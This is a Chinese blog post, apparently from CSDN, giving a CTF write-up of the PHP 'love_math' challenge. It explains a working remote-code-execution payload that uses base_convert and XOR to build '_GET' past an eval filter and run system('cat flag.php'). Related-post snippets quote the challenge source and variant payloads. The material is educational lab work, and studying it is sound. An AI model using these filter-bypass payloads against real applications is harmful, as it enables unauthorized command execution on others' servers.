CTF之love_math

于 2024-05-12 23:49:45 发布
阅读量177 收藏
点赞数 2
分类专栏: ctf 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/138768132
版权

  这个题目简单看一下就知道要传参进行执行系统命令以达到找到flag的目的。

但是又可以发现过滤了很多东西。

 这个题的绕过方法可以用到三个函数

base_convert(number,froombase,tobase)//分别为原始值,原来进制,要转换的进制

dechex("十进制数")//将十进制数转换成十六进制

hex2bin("十六进制数")//将十六进制数转换成ASCII字符

接着便是构造payload了

?0=system&1=cat%20flag.php&c=$pi=base_convert;$pi=$pi(53179,10,36)^$pi(1109136,10,36);${$pi}{0}(${$pi}{1})

下面解释一下这个payload

$pi=base_convert;
    $p=$pi(53179,10,36);//1517
    $i=$pi(1109136,10,36);//nrtc
    echo $p.PHP_EOL;
    echo $i.PHP_EOL;
    echo $p^$i;//_GET

//所以?0=system&1=cat%20flag.php&c=$pi=base_convert;$pi=$pi(53179,10,36)^$pi(1109136,10,36);${$pi}{0}(${$pi}{1})
等价于

$pi=_GET;
0=system;
1=cat flag.php;
$_GET{0}($_GET{1}) //system(cat flag.php)

 

小黑子不会打篮球
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuCTF平台逆向题第五道love题解
iqiqiya的博客
12-28 8382
题目链接: http://123.206.31.85/files/99278e700add95793a765b13ab1314ea/reverse_3.exe tips: 查壳无壳(截图略) 载入OD 搜索字符串 随意输入1111111111111111111 发现进行了base64加密 再向下单步 发现、 结合IDA看下 int su
BUUCTF:[CISCN 2019 初赛]Love Math
qq_46230755的博客
12-27 906
base_convert(37907361743,10,36)得到“hex2bin” dechex(1598506324)得到“5f474554” $pi=hex2bin(5f474554)得到$pi="_GET" ($$pi){pi}(($$pi){abs})=$_GET{pi}($_GET{abs})
buuctf-Love Math1
m0_62094846的博客
05-07 251
<?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r.
[攻防世界]-WEB高手进阶区-love_math
爱国小白帽
10-03 1753
题目 就这么点人答,可能是因为太简单了大佬都不稀做吧 这个奇怪的题打开以后是这样的 它可以做减乘除,唯独不能做加法 解题过程 我的解题方法简单粗暴,直接访问flag.php文件完活 当然这可能是他们的一个bug,真正的大佬谁会这样解呢,这题主要考的是如何构造payload执行命令 [官方步骤] 可以看到题目限制了参数的长度要小于80,且不能包含空格、制表符、换行、单双引号、反引号、[]。并且输入的字符串需要为$whitelist中的函数。 最终会执行 eval('echo '.$content.'
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解)
小宇的web博客
02-26 2820
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解) 1.先看题目 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
ctf.rar_ctf
09-21
this is script from my ctf
2019CISCN web题赛-JustSoSo;love_math(复现)
weixin_30466953的博客
05-02 893
0x00前言 这几天从网上找个CMS源码开始练习审计,盯着众多的代码debug调呀调头晕脑胀的,还不错找到个文件读取和一个ssrf... 上月底结束的CISCN线上赛,web四道,仔细研究的2道,做出了一道,刚好比赛时顺手把源码弄了下来,结合赛后师傅们的writeup复现一下这两道 0x01JustSoSo 有3个文件,index.php和hint.php可以通过文件filter来读...
国赛 love_math ----web学习
weixin_44897902的博客
10-14 1730
love_math:(异或,无参数RCE的getallheaders()) 这是源码: <html> <meta charset="utf-8"> </html> <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(...
[CISCN 2019 初赛]Love Math 记录
SopRomeo的博客
05-05 528
<?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { ...
攻防世界 web高手进阶区 8分题 love_math
闵行小鱼塘
10-03 1063
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是love_math的writeup
南邮CTF web题目总结
热门推荐
超人学飞的日子
06-02 1万+
这几天写了南邮的web题目,都比较基础,但是对我这个小白来说还是收获蛮大的。可以借此总结一下web题的类型一,信息都藏在哪作为ctf题目,肯定是要有些提示的,这些提示有时会在题目介绍里说有时也会隐藏在某些地方。1,源代码,这是最最最常见的。2,http head头中,这个一般都会提下 ‘头’ 什么的。3,非常规提示,就比如这个:如果第一次做ctf题目,不知道还有这些套路,一般不会往这个方面想。二,...
2019年CTF4月比赛记录(三):SUSCTF 2nd、DDCTF、国赛线上初赛部分Web题目writeup与复现
極品━═☆宏的博客
04-25 3309
四月中旬以来事情还是蛮多的,先捋一捋: 首先有幸参加了东南大学承办的SUSCTF 2nd,虽然比赛的规模不是很大,但是这也是第一次以小组的方式正式参加比赛,也是对前期学习成果的检验。在同组成员的努(带)力(飞)下,取得了前十名的成绩,混了个奖; 后来又报名了DDCTF-2019,做了做web题目,当给国赛练练手; 紧接着小组报名参加国赛预赛,周六开始周日结束,作为web手,这web题做的是真尼玛自...
2020-10-11
tianmoxiangfu的博客
10-11 228
我的博客第10篇 1.高阶函数 。接收函数作为参数 。或者将函数作为返回值返回的函数就是高阶函数 对比练习: #需求:将一个指定列表中的偶数,保存到一个新的列表中返回 list1 = [1,2,3,4,5,6,7,8,9,10] def fn(list1): new_list = [] for i in list1: if i % 2 == 0: new_list.append(i) return new_list r = fn(list1)
ctf_awd_platform
最新发布
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。比赛的过程中,参赛选手需要使用各种技术和工具,对其他小队的系统进行攻击,尝试获取对方的旗帜。同时,参赛选手也需要保护自己的系统,防止其他小队进行攻击并窃取自己的旗帜。 ctf_awd_platform提供了一个仿真的网络环境,模拟了现实世界中的网络系统。参赛选手可以在这个环境中进行攻防实战,通过解决各种网络安全问题来提升自己的技能。 ctf_awd_platform不仅能够帮助参赛选手提升网络攻防技术,还能够提高其团队合作能力和解决问题的能力。在比赛中,参赛选手需要与队友紧密配合,共同制定攻击和防御策略,以获取最佳的比赛成绩。 总体而言,ctf_awd_platform是一个能够帮助参赛选手提升网络安全技术和团队合作能力的AWD平台,通过实战演练来提高参赛选手的技能水平,并为他们在网络安全领域的职业发展打下坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值